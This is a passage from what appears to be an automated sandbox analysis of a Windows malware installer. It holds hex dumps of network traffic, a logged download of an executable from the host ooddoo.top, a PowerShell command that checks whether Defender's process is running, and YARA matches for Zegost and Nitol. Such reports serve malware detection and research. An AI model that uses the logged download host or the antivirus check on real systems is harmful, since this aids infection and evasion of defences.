2024-12-29 15:03:38 UTC	1369	IN	Data Raw: e2 da d1 65 24 ca c5 ef 01 a5 7a 90 1d 60 db d5 9a 10 85 a4 4d 98 7a 7d 3a f9 c2 0f 9c 0d 06 7b c7 ea d5 66 de 04 86 f3 f5 e7 33 55 79 a8 1c 8d 7f 21 81 f5 f0 ae 99 1a 9f db 67 60 a9 18 88 fe b7 98 29 7b 4a 36 9a 2a 14 2a 77 fb 33 7f 01 68 1c 5a 08 e7 5b 37 a2 f5 a7 14 88 8e 11 c8 a0 2d 1d 34 31 52 ed c6 ea 9c 10 45 5c ad f5 c9 c3 ee a8 24 4f 42 96 a7 20 54 ea 62 9c 2e d4 b4 c0 9a d4 ca de b7 a4 1a fa 08 33 61 d6 cf ab b4 c1 b3 df cc c7 a4 72 12 18 02 f2 a4 8e 18 9f aa 31 51 4b 9f f9 b4 e6 04 48 22 7a 7c c0 93 a2 ac 2e 99 8a 12 3f 52 b7 a8 3c ea a9 13 19 60 44 58 cc 55 93 c7 10 6c 29 72 b6 71 21 21 58 97 b0 9d 89 1d a6 25 43 51 a8 cc 11 cd 76 04 40 ca a9 64 2e 44 2c b3 30 e1 a6 b3 56 cd cc b4 b8 1f b4 16 68 7f 22 35 ea 64 1c a1 27 88 0e b6 3e dd 16 9d af Data Ascii: e$z`Mz}:{f3Uy!g`){J6**w3hZ[7-41RE\$OB Tb.3ar1QKH"z\|.?R<`DXUl)rq!!X%CQv@d.D,0Vh"5d'>
2024-12-29 15:03:38 UTC	1369	IN	Data Raw: 65 27 f5 21 c4 de 2a f9 13 01 72 99 d6 a9 fb 17 fc 72 c2 96 2e 60 bc 85 9e f8 c9 98 b8 ff 2e 6c 13 29 d8 7a 89 46 41 5f b9 df 1e b4 f0 75 88 82 71 58 09 9c 5a b1 e5 fa 50 c7 24 34 68 a5 6b d5 5b 78 3a 1d d3 57 f1 01 ae dd 05 33 a1 b1 0b ff a6 13 73 c6 9d c0 32 96 a0 f0 79 c3 02 1a 7b f6 bb a7 5e 83 fb a1 d9 77 6b bf f4 36 91 88 c4 68 21 a4 e5 4a 71 53 ff 6c 5a ae 5c ad 1b ae d7 7b 55 ba 79 f1 6c c2 cb a2 4c c1 f6 42 88 20 4e 87 c2 70 78 93 c5 27 f5 46 ae c2 02 97 b9 d5 9b f7 98 b2 ee 72 fc c5 44 e3 9d dd 4b 31 29 5d 85 28 9f 3c a3 82 44 11 74 c8 1c ed 4d 3f 2b 6d 64 42 9a 57 8c a5 aa 89 a4 9f f5 36 77 3c 6f 4c c1 cb b9 70 a5 c5 5a f0 8f f6 7d 5d b4 05 a3 53 a2 1a ec 27 15 33 1a 40 b8 52 00 fd 52 a3 9f 5a 27 d5 b4 2f db c2 04 d1 65 da c4 97 25 6d a7 12 6b Data Ascii: e'!*rr.`.l)zFA_uqXZP$4hk[x:W3s2y{^wk6h!JqSlZ\{UylLB Npx'FrDK1)](<DtM?+mdBW6w<oLpZ}]S'3@RRZ'/e%mk
2024-12-29 15:03:38 UTC	1369	IN	Data Raw: af 96 3e 86 2c c2 d5 f6 a5 eb e6 58 c1 80 0c dc 5d 51 cd c1 cb 24 29 7a c0 37 a6 ec b1 9f a2 cf c0 a6 ad b9 84 31 ad 3a bb 08 74 a3 a2 f9 5e d4 41 f6 02 a1 32 0b 09 b4 00 a0 be 1f c2 5f a1 cf 4b 6b 26 44 16 14 a1 a9 cf d1 73 59 e3 59 cf 36 a4 b7 3f 96 27 2a 92 19 a3 6c af 46 f5 6d 86 40 fd b4 0d c2 84 ed d4 45 c1 c3 cc cd 89 0a 63 c0 86 8c da 20 2f 3e 75 0a 40 8a 96 0c 87 80 23 b9 ff 1f 96 69 78 6a 38 d0 c4 8a 2c ad 4c e9 8e 7c 8e 3c 9a 58 dd 70 78 cd 84 7c 8c e9 3b fd a3 58 86 5d e1 b0 e3 31 71 b4 ae e1 56 ee ed 3b 36 10 c0 4d ee 23 40 b9 d2 df 4f 28 ac 83 0c bd 6a df 6e d2 56 ea aa c6 59 a4 90 14 62 92 b6 96 9d a4 88 9b 62 d9 ab c8 cf 63 68 34 38 d8 ec 7c 9d f3 80 4b eb 59 83 6c c1 c4 3e e0 17 80 35 9a c3 6f cc 29 e8 5c b1 f9 0a fc ac 5d cd 14 13 e1 56 Data Ascii: >,X]Q$)z71:t^A2_Kk&DsYY6?'*lFm@Ec />u@#ixj8,L\|<Xpx\|;X]1qV;6M#@O(jnVYbbch48\|KYl>5o)\]V
2024-12-29 15:03:38 UTC	1369	IN	Data Raw: c4 82 5c ae 6f 7f 39 2e e5 da a5 9d 61 86 b2 4c 3a 9f 54 d8 26 4e b2 4b a6 f0 81 ea 3f a7 44 15 72 67 f5 74 68 b0 78 91 d6 f6 7a 6b d8 ba a0 70 44 b0 88 ee 6c 2a d1 40 fa 7c 1c a9 7c db 1b f5 c9 da 1d c0 b6 f6 65 af 6d e8 93 9b e5 5f 21 eb 44 5f d5 2e a5 8a fe 7f 59 73 9f d7 45 f9 92 b5 7e a2 ea 1a 71 73 65 56 26 c0 fc 84 1f 32 5f c4 f9 de c5 b4 b4 96 ee 00 42 df d9 df c7 be 9d fe a5 8b 84 8f de eb 0f f4 8d 73 bc 21 09 6b 1b 79 ab 2b 6b 17 7a 91 6c 30 db bd a0 13 a7 d9 93 8d d5 d2 a0 2d e5 73 6c e3 ef fb 18 dd af 28 53 dc 9f ca 6d f4 6d 7e 43 ee 70 5e af a8 b6 ea 3e fe c5 bb dd b0 a2 d3 d5 1b 63 2b fc cf d6 9e 74 e8 70 f5 d0 28 ae ef d1 71 61 ed 10 06 94 15 ae b7 79 28 ce cb e3 2f c4 17 8e 7a 88 ac 66 7f 83 e4 ab 4f 6e 08 e9 00 52 80 28 97 89 a9 ed 18 e2 Data Ascii: \o9.aL:T&NK?DrgthxzkpDl*@\|\|em_!D_.YsE~qseV&2_Bs!ky+kzl0-sl(Smm~Cp^>c+tp(qay(/zfOnR(
2024-12-29 15:03:38 UTC	1369	IN	Data Raw: 41 ea 35 16 e5 fc d9 31 2e 66 fe 25 be 64 ea a5 da a3 af a7 0d f0 0b 98 d3 25 9d 5d 7e c6 3f 62 f7 54 e9 c2 e6 99 0c 3d 52 47 d3 d5 90 76 3f 73 04 1e 94 18 8b 93 20 65 7a 8c b9 69 93 aa e9 f6 e7 49 df ad a6 39 0a 62 b2 58 c0 69 89 c0 d9 e0 8e bd 68 99 69 c3 69 ec 63 8d 14 d9 ae 96 c0 66 9a c3 b3 e5 8a 7f 56 f2 ab bb a4 9a dd a3 dc 65 32 c8 29 3f 83 26 11 99 d5 9b d9 a2 a9 ea fd 4d 01 07 39 2d f2 5a 48 64 05 86 67 8a a4 22 69 a9 e6 c0 5d 9d da b8 f0 8a 96 0b 5d 10 97 3c 0f 05 e3 83 a4 a9 ae 43 f2 8c 93 a6 40 2d 99 7e 77 ad 74 a8 ec c5 d7 b4 43 59 d7 af e9 b4 92 b8 f8 c8 e1 a1 88 8d b3 44 a0 78 98 7a ac 9d 85 d3 ce 8a cf b6 a7 39 52 5b d1 86 92 e3 17 97 0b 28 b6 24 cc 5c cc 63 81 12 28 f2 d0 b7 81 5f bd 46 71 6e a2 10 7e e9 db a2 99 87 38 bf 8e 4d ea 09 93 Data Ascii: A51.f%d%]~?bT=RGv?s eziI9bXihiicfVe2)?&M9-ZHdg"i]]<C@-~wtCYDxz9R[($\c(_Fqn~8M
2024-12-29 15:03:38 UTC	1369	IN	Data Raw: e9 83 4c f4 1e 30 65 f8 0f 5e 95 ac 63 a4 81 f4 65 2f 7c af 5d c9 38 ea 5d d0 93 ad 38 70 40 bd 91 1d af f2 f2 f5 b6 88 96 69 36 4a 60 a3 51 15 a4 ac fd 76 25 c8 6e 99 99 a7 1a 2e a0 be 19 f1 5d 89 e9 d2 d1 b2 0f 03 f4 b2 3b c9 5e d8 bb b4 0c fb 1f 7a 9c 08 ac 86 92 be f0 ef 92 41 ba 9a cf cb 4d 12 a6 6d 72 71 85 d3 bd 97 54 29 e5 19 9e cc 9a 2a 1d ce 25 0b 60 ab 23 c4 81 73 0b ac 7e 6b ff 12 05 59 9f 6b c9 77 14 49 48 de 1f 4b 3d 6c 58 32 cd 17 71 c5 be f0 76 81 53 a8 b2 85 a7 45 88 fe d9 2c ab 5d 81 e7 6d a1 a3 60 2d 4e ef 4f 5f 32 d3 6d a3 3a 78 50 6a dc 67 31 9c 4c 47 f8 fd d4 12 20 2a 9b d7 02 a9 36 54 6d 78 94 b9 36 13 f2 15 00 f5 f9 b8 88 8a 80 30 4b 12 b4 6a bf a4 c9 65 eb 2c 9c 27 a8 ac ce fc be 10 6d 73 17 9b ad 8c cc 9f 0a 8c 20 50 1b 6b b6 24 Data Ascii: L0e^ce/\|]8]8p@i6J`Qv%n.];^zAMmrqT)%`#s~kYkwIHK=lX2qvSE,]m`-NO_2m:xPjg1LG 6Tmx60Kje,'ms Pk$
2024-12-29 15:03:38 UTC	1369	IN	Data Raw: 69 b9 86 58 17 77 d1 ec 66 f0 cf 65 b1 26 56 2f 66 81 fe d8 33 1d be 0a de d2 40 5e 25 92 da 63 21 a0 46 60 01 21 b3 3b 91 7f 74 f6 e8 a6 9c 15 93 00 3a 9d 15 6b 92 1c 88 f5 67 08 f9 29 2b 56 92 e8 d2 fb dd 52 8b 62 5d 51 a4 19 bb eb a3 10 3b e6 a2 96 f4 86 78 17 ce ff 87 36 6d c1 b1 cd fb 18 df ec c4 be d9 58 01 ab 0f 22 f5 94 1b 9c 21 c1 de 9d 0b 68 9d 5e f7 ac 4b 93 ab ee 6b fd a3 9f 27 03 85 8a 4b 31 4d aa b2 9a 39 07 fb 40 50 b6 00 9d a3 0a 94 b9 a5 15 d1 29 08 f4 b9 5c 00 28 ee 16 2d 8c 66 6c fe 01 4b 07 e7 a7 51 24 f8 c4 7a 3d 26 b7 0f a5 17 1d c9 5a f2 61 ef ee 6a d8 e0 c5 e7 57 3b d4 4d 74 d8 6b 01 7c ee 69 62 01 18 63 81 b2 fc b3 99 49 10 b6 ef 89 29 d0 d5 5d d2 14 15 e6 27 53 8c 71 83 8d ee 74 f4 5f a8 5c b4 8a cf 6d ee 48 f3 e7 be 24 1d 14 bf Data Ascii: iXwfe&V/f3@^%c!F`!;t:kg)+VRb]Q;x6mX"!h^Kk'K1M9@P)\(-flKQ$z=&ZajW;Mtk\|ibcI)]'Sqt_\mH$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49737	104.21.81.224	443	5800	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-29 15:03:46 UTC	139	OUT	GET /abc/40.exe HTTP/1.1 Accept: / User-Agent: Setup Factory 9.0 Connection: Keep-Alive Cache-Control: no-cache Host: ooddoo.top
2024-12-29 15:03:47 UTC	902	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 15:03:47 GMT Content-Type: application/octet-stream Content-Length: 3149120 Connection: close Last-Modified: Sun, 29 Dec 2024 14:37:07 GMT ETag: "b672623ff59db1:0" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 9 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nPaYP%2BodVVYQZlSyR8Eu8Q4qPgeU0cyXEqQqE1dd0LnlnN8WOrWh84p9yIurb585WCR3V2p%2BDTKJqqsNbecIk4DURyyKza0C3U1RsvdFfI85F08e%2B1T1YwU5resM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9aadc71ac9424d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2562&min_rtt=2522&rtt_var=974&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=753&delivery_rate=1157811&cwnd=208&unsent_bytes=0&cid=441eff078a719314&ts=468&x=0"
2024-12-29 15:03:47 UTC	467	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3f b7 1b 9a 7b d6 75 c9 7b d6 75 c9 7b d6 75 c9 a8 a4 76 c8 76 d6 75 c9 a8 a4 70 c8 d2 d6 75 c9 a8 a4 71 c8 6d d6 75 c9 df a8 71 c8 6a d6 75 c9 df a8 76 c8 6f d6 75 c9 a8 a4 73 c8 7a d6 75 c9 df a8 70 c8 28 d6 75 c9 a8 a4 74 c8 76 d6 75 c9 7b d6 74 c9 0e d6 75 c9 59 a9 7c c8 7a d6 75 c9 59 a9 8a c9 7a d6 75 c9 59 a9 77 c8 7a d6 75 c9 52 69 63 68 7b d6 75 c9 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$?{u{u{uvvupuqmuqjuvouszup(utvu{tuY\|zuYzuYwzuRich{u
2024-12-29 15:03:47 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 4c cb 01 00 00 10 00 00 00 04 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 20 20 20 20 20 20 20 20 a0 d1 00 00 00 e0 01 00 00 62 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 68 1c 00 00 00 c0 02 00 00 04 00 00 00 6a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 a9 97 05 00 00 e0 02 00 00 e0 01 00 00 6e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 2c 1b 00 00 00 80 08 00 00 18 00 00 00 4e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 69 Data Ascii: L ` b@@ hj@ n@@ ,N@B.i
2024-12-29 15:03:47 UTC	1369	IN	Data Raw: a4 ee de a4 84 b2 ce 94 74 2c ab 2f c0 36 a4 ee 59 0c 4f 92 ef 61 aa 96 05 bb 65 68 75 d3 d2 fa a4 c3 0c 1b 97 a5 21 ac 7f 2b 0e c0 cd 0b f2 72 89 0e 4a a8 a8 e4 54 a4 3b a7 ce 73 29 7d 1c 7c e6 0b 4d fb 4d 7f 62 b6 36 d5 48 36 87 fc c0 26 15 2c 3f 6e f4 5e 20 a3 69 7e 64 e9 41 e6 7d 44 71 62 a4 98 ad 9f 24 c6 1d 5a 9d 01 a7 92 93 b9 66 b2 b5 26 07 2d 1c 28 f6 26 f0 9e 1e 01 62 78 79 f5 5d 38 58 eb 2c 34 d7 9a ac 12 2d 66 aa 4a 9b ca 18 95 9a 7c 6d fa aa 3b 5d ce 8d 62 16 06 fd 9a de dc ed a1 69 b9 21 fb ec 8d b7 d8 c0 34 82 e4 a5 3c 8d ac 1c b4 4c a1 a9 1b b0 1a a4 1f b8 65 1b e7 2a 1d 63 ff 71 cc 86 14 81 31 5e 9f ce d8 70 ab ab 06 3a a5 6a 04 ad 77 5f 8e c3 f4 30 3e 7d f5 12 ce 35 8f 9e 6c a0 6f 44 a0 10 e1 8f 56 8a 97 3b b4 1e 3c 85 80 1d 7a 6e d8 4f Data Ascii: t,/6YOaehu!+rJT;s)}\|MMb6H6&,?n^ i~dA}Dqb$Zf&-(&bxy]8X,4-fJ\|m;]bi!4<Le*cq1^p:jw_0>}5loDV;<znO
2024-12-29 15:03:47 UTC	1369	IN	Data Raw: 40 60 4d 71 25 dd 47 55 71 7c e2 25 e2 da d1 65 24 ca c5 ef 01 a5 7a 90 1d 60 db d5 9a 10 85 a4 4d 98 7a 7d 3a f9 c2 0f 9c 0d 06 7b c7 ea d5 66 de 04 86 f3 f5 e7 33 55 79 a8 1c 8d 7f 21 81 f5 f0 ae 99 1a 9f db 67 60 a9 18 88 fe b7 98 29 7b 4a 36 9a 2a 14 2a 77 fb 33 7f 01 68 1c 5a 08 e7 5b 37 a2 f5 a7 14 88 8e 11 c8 a0 2d 1d 34 31 52 ed c6 ea 9c 10 45 5c ad f5 c9 c3 ee a8 24 4f 42 96 a7 20 54 ea 62 9c 2e d4 b4 c0 9a d4 ca de b7 a4 1a fa 08 33 61 d6 cf ab b4 c1 b3 df cc c7 a4 72 12 18 02 f2 a4 8e 18 9f aa 31 51 4b 9f f9 b4 e6 04 48 22 7a 7c c0 93 a2 ac 2e 99 8a 12 3f 52 b7 a8 3c ea a9 13 19 60 44 58 cc 55 93 c7 10 6c 29 72 b6 71 21 21 58 97 b0 9d 89 1d a6 25 43 51 a8 cc 11 cd 76 04 40 ca a9 64 2e 44 2c b3 30 e1 a6 b3 56 cd cc b4 b8 1f b4 16 68 7f 22 35 ea Data Ascii: @`Mq%GUq\|%e$z`Mz}:{f3Uy!g`){J6**w3hZ[7-41RE\$OB Tb.3ar1QKH"z\|.?R<`DXUl)rq!!X%CQv@d.D,0Vh"5
2024-12-29 15:03:47 UTC	1369	IN	Data Raw: 2d cb a5 e9 50 3a 39 9d 91 69 ee 91 65 27 f5 21 c4 de 2a f9 13 01 72 99 d6 a9 fb 17 fc 72 c2 96 2e 60 bc 85 9e f8 c9 98 b8 ff 2e 6c 13 29 d8 7a 89 46 41 5f b9 df 1e b4 f0 75 88 82 71 58 09 9c 5a b1 e5 fa 50 c7 24 34 68 a5 6b d5 5b 78 3a 1d d3 57 f1 01 ae dd 05 33 a1 b1 0b ff a6 13 73 c6 9d c0 32 96 a0 f0 79 c3 02 1a 7b f6 bb a7 5e 83 fb a1 d9 77 6b bf f4 36 91 88 c4 68 21 a4 e5 4a 71 53 ff 6c 5a ae 5c ad 1b ae d7 7b 55 ba 79 f1 6c c2 cb a2 4c c1 f6 42 88 20 4e 87 c2 70 78 93 c5 27 f5 46 ae c2 02 97 b9 d5 9b f7 98 b2 ee 72 fc c5 44 e3 9d dd 4b 31 29 5d 85 28 9f 3c a3 82 44 11 74 c8 1c ed 4d 3f 2b 6d 64 42 9a 57 8c a5 aa 89 a4 9f f5 36 77 3c 6f 4c c1 cb b9 70 a5 c5 5a f0 8f f6 7d 5d b4 05 a3 53 a2 1a ec 27 15 33 1a 40 b8 52 00 fd 52 a3 9f 5a 27 d5 b4 2f db Data Ascii: -P:9ie'!*rr.`.l)zFA_uqXZP$4hk[x:W3s2y{^wk6h!JqSlZ\{UylLB Npx'FrDK1)](<DtM?+mdBW6w<oLpZ}]S'3@RRZ'/
2024-12-29 15:03:47 UTC	1369	IN	Data Raw: 42 4e 9a 40 b5 96 43 69 39 74 25 3e af 96 3e 86 2c c2 d5 f6 a5 eb e6 58 c1 80 0c dc 5d 51 cd c1 cb 24 29 7a c0 37 a6 ec b1 9f a2 cf c0 a6 ad b9 84 31 ad 3a bb 08 74 a3 a2 f9 5e d4 41 f6 02 a1 32 0b 09 b4 00 a0 be 1f c2 5f a1 cf 4b 6b 26 44 16 14 a1 a9 cf d1 73 59 e3 59 cf 36 a4 b7 3f 96 27 2a 92 19 a3 6c af 46 f5 6d 86 40 fd b4 0d c2 84 ed d4 45 c1 c3 cc cd 89 0a 63 c0 86 8c da 20 2f 3e 75 0a 40 8a 96 0c 87 80 23 b9 ff 1f 96 69 78 6a 38 d0 c4 8a 2c ad 4c e9 8e 7c 8e 3c 9a 58 dd 70 78 cd 84 7c 8c e9 3b fd a3 58 86 5d e1 b0 e3 31 71 b4 ae e1 56 ee ed 3b 36 10 c0 4d ee 23 40 b9 d2 df 4f 28 ac 83 0c bd 6a df 6e d2 56 ea aa c6 59 a4 90 14 62 92 b6 96 9d a4 88 9b 62 d9 ab c8 cf 63 68 34 38 d8 ec 7c 9d f3 80 4b eb 59 83 6c c1 c4 3e e0 17 80 35 9a c3 6f cc 29 e8 Data Ascii: BN@Ci9t%>>,X]Q$)z71:t^A2_Kk&DsYY6?'*lFm@Ec />u@#ixj8,L\|<Xpx\|;X]1qV;6M#@O(jnVYbbch48\|KYl>5o)
2024-12-29 15:03:47 UTC	1369	IN	Data Raw: f4 d4 61 e5 9e ee 5e 1c 33 ad 8f 25 c4 82 5c ae 6f 7f 39 2e e5 da a5 9d 61 86 b2 4c 3a 9f 54 d8 26 4e b2 4b a6 f0 81 ea 3f a7 44 15 72 67 f5 74 68 b0 78 91 d6 f6 7a 6b d8 ba a0 70 44 b0 88 ee 6c 2a d1 40 fa 7c 1c a9 7c db 1b f5 c9 da 1d c0 b6 f6 65 af 6d e8 93 9b e5 5f 21 eb 44 5f d5 2e a5 8a fe 7f 59 73 9f d7 45 f9 92 b5 7e a2 ea 1a 71 73 65 56 26 c0 fc 84 1f 32 5f c4 f9 de c5 b4 b4 96 ee 00 42 df d9 df c7 be 9d fe a5 8b 84 8f de eb 0f f4 8d 73 bc 21 09 6b 1b 79 ab 2b 6b 17 7a 91 6c 30 db bd a0 13 a7 d9 93 8d d5 d2 a0 2d e5 73 6c e3 ef fb 18 dd af 28 53 dc 9f ca 6d f4 6d 7e 43 ee 70 5e af a8 b6 ea 3e fe c5 bb dd b0 a2 d3 d5 1b 63 2b fc cf d6 9e 74 e8 70 f5 d0 28 ae ef d1 71 61 ed 10 06 94 15 ae b7 79 28 ce cb e3 2f c4 17 8e 7a 88 ac 66 7f 83 e4 ab 4f 6e Data Ascii: a^3%\o9.aL:T&NK?DrgthxzkpDl*@\|\|em_!D_.YsE~qseV&2_Bs!ky+kzl0-sl(Smm~Cp^>c+tp(qay(/zfOn
2024-12-29 15:03:47 UTC	1369	IN	Data Raw: 2c 71 27 3b b4 19 87 7b 9f c9 d9 53 41 ea 35 16 e5 fc d9 31 2e 66 fe 25 be 64 ea a5 da a3 af a7 0d f0 0b 98 d3 25 9d 5d 7e c6 3f 62 f7 54 e9 c2 e6 99 0c 3d 52 47 d3 d5 90 76 3f 73 04 1e 94 18 8b 93 20 65 7a 8c b9 69 93 aa e9 f6 e7 49 df ad a6 39 0a 62 b2 58 c0 69 89 c0 d9 e0 8e bd 68 99 69 c3 69 ec 63 8d 14 d9 ae 96 c0 66 9a c3 b3 e5 8a 7f 56 f2 ab bb a4 9a dd a3 dc 65 32 c8 29 3f 83 26 11 99 d5 9b d9 a2 a9 ea fd 4d 01 07 39 2d f2 5a 48 64 05 86 67 8a a4 22 69 a9 e6 c0 5d 9d da b8 f0 8a 96 0b 5d 10 97 3c 0f 05 e3 83 a4 a9 ae 43 f2 8c 93 a6 40 2d 99 7e 77 ad 74 a8 ec c5 d7 b4 43 59 d7 af e9 b4 92 b8 f8 c8 e1 a1 88 8d b3 44 a0 78 98 7a ac 9d 85 d3 ce 8a cf b6 a7 39 52 5b d1 86 92 e3 17 97 0b 28 b6 24 cc 5c cc 63 81 12 28 f2 d0 b7 81 5f bd 46 71 6e a2 10 7e Data Ascii: ,q';{SA51.f%d%]~?bT=RGv?s eziI9bXihiicfVe2)?&M9-ZHdg"i]]<C@-~wtCYDxz9R[($\c(_Fqn~
2024-12-29 15:03:47 UTC	1369	IN	Data Raw: 31 c3 6e eb cd 99 f5 ca bb cc f5 66 e9 83 4c f4 1e 30 65 f8 0f 5e 95 ac 63 a4 81 f4 65 2f 7c af 5d c9 38 ea 5d d0 93 ad 38 70 40 bd 91 1d af f2 f2 f5 b6 88 96 69 36 4a 60 a3 51 15 a4 ac fd 76 25 c8 6e 99 99 a7 1a 2e a0 be 19 f1 5d 89 e9 d2 d1 b2 0f 03 f4 b2 3b c9 5e d8 bb b4 0c fb 1f 7a 9c 08 ac 86 92 be f0 ef 92 41 ba 9a cf cb 4d 12 a6 6d 72 71 85 d3 bd 97 54 29 e5 19 9e cc 9a 2a 1d ce 25 0b 60 ab 23 c4 81 73 0b ac 7e 6b ff 12 05 59 9f 6b c9 77 14 49 48 de 1f 4b 3d 6c 58 32 cd 17 71 c5 be f0 76 81 53 a8 b2 85 a7 45 88 fe d9 2c ab 5d 81 e7 6d a1 a3 60 2d 4e ef 4f 5f 32 d3 6d a3 3a 78 50 6a dc 67 31 9c 4c 47 f8 fd d4 12 20 2a 9b d7 02 a9 36 54 6d 78 94 b9 36 13 f2 15 00 f5 f9 b8 88 8a 80 30 4b 12 b4 6a bf a4 c9 65 eb 2c 9c 27 a8 ac ce fc be 10 6d 73 17 9b Data Ascii: 1nfL0e^ce/\|]8]8p@i6J`Qv%n.];^zAMmrqT)%`#s~kYkwIHK=lX2qvSE,]m`-NO_2m:xPjg1LG 6Tmx60Kje,'ms
2024-12-29 15:03:47 UTC	1369	IN	Data Raw: f1 dd cb be b3 46 97 dc 21 98 7a e3 69 b9 86 58 17 77 d1 ec 66 f0 cf 65 b1 26 56 2f 66 81 fe d8 33 1d be 0a de d2 40 5e 25 92 da 63 21 a0 46 60 01 21 b3 3b 91 7f 74 f6 e8 a6 9c 15 93 00 3a 9d 15 6b 92 1c 88 f5 67 08 f9 29 2b 56 92 e8 d2 fb dd 52 8b 62 5d 51 a4 19 bb eb a3 10 3b e6 a2 96 f4 86 78 17 ce ff 87 36 6d c1 b1 cd fb 18 df ec c4 be d9 58 01 ab 0f 22 f5 94 1b 9c 21 c1 de 9d 0b 68 9d 5e f7 ac 4b 93 ab ee 6b fd a3 9f 27 03 85 8a 4b 31 4d aa b2 9a 39 07 fb 40 50 b6 00 9d a3 0a 94 b9 a5 15 d1 29 08 f4 b9 5c 00 28 ee 16 2d 8c 66 6c fe 01 4b 07 e7 a7 51 24 f8 c4 7a 3d 26 b7 0f a5 17 1d c9 5a f2 61 ef ee 6a d8 e0 c5 e7 57 3b d4 4d 74 d8 6b 01 7c ee 69 62 01 18 63 81 b2 fc b3 99 49 10 b6 ef 89 29 d0 d5 5d d2 14 15 e6 27 53 8c 71 83 8d ee 74 f4 5f a8 5c b4 Data Ascii: F!ziXwfe&V/f3@^%c!F`!;t:kg)+VRb]Q;x6mX"!h^Kk'K1M9@P)\(-flKQ$z=&ZajW;Mtk\|ibcI)]'Sqt_\

Target ID:	0
Start time:	10:03:18
Start date:	29/12/2024
Path:	C:\Users\user\Desktop\Whyet-4.9.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Whyet-4.9.exe"
Imagebase:	0x7ff676fa0000
File size:	21'152'435 bytes
MD5 hash:	F317C17035501AAAD0ABFAF9FBA4C085
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:03:18
Start date:	29/12/2024
Path:	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5655410 "__IRAFN:C:\Users\user\Desktop\Whyet-4.9.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003"
Imagebase:	0x7ff783cc0000
File size:	5'153'280 bytes
MD5 hash:	2A7D5F8D3FB4AB753B226FD88D31453B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	10:03:24
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:03:24
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:03:24
Start date:	29/12/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Imagebase:	0x7ff746ef0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:03:27
Start date:	29/12/2024
